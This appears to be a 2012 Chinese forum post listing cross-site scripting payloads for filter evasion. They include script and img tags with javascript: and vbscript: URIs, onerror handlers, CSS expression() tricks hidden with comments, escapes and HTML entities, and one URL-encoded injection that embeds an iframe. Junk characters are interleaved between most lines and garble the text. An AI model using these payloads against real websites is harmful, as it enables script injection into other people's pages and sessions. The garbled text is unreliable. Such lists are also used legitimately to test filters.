<script>alert("跨站")</script> (最常用)2 y- U' a; y e# `
<img scr=javascript:alert("跨站")></img>, x0 d" [0 Q! ^/ h7 R
<img scr="javascript: alert(/跨站/)></img>
3 Y9 \4 t/ [# V5 t<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)6 K1 A. |3 q+ @- ]9 |) q
<img scr="#" onerror=alert(/跨站/)></img>
% f- m0 A( Q4 e0 X, w<img scr="#" style="xss:expression(alert(/xss/));"></img>
4 U3 D1 R' D( H A<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# B( T6 a+ V" X- j4 u% `+ [ q<img src=vbscript:msgbox ("xss")></img>0 E- L' i) E9 L Y- N9 I( D& D" j- r
<style> input {left:expression (alert('xss'))}</style>7 X/ ?5 p6 x+ L u
<div style={left:expression (alert('xss'))}></div>
! n7 C. `( C" U<div style={left:exp/* */ression (alert('xss'))}></div>$ ]; E3 U R v, G- t; V8 O Y
<div style={left:\0065\0078ression (alert('xss'))}></div>
6 z* J A2 O* ?% P3 d& qhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' x' p5 c! E) a/ K1 O8 I% z& Sunicode <div style="{left:expRessioN (alert('xss'))}">
7 g1 u. _3 j% I' v3 b+ C7 Y C" O a0 n: C Q% ^4 c9 s$ a( O
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
) g/ h( B6 E, a0 p+ i$ c* ^ |
发表于 2012-9-13 17:15:04
收藏
支持
反对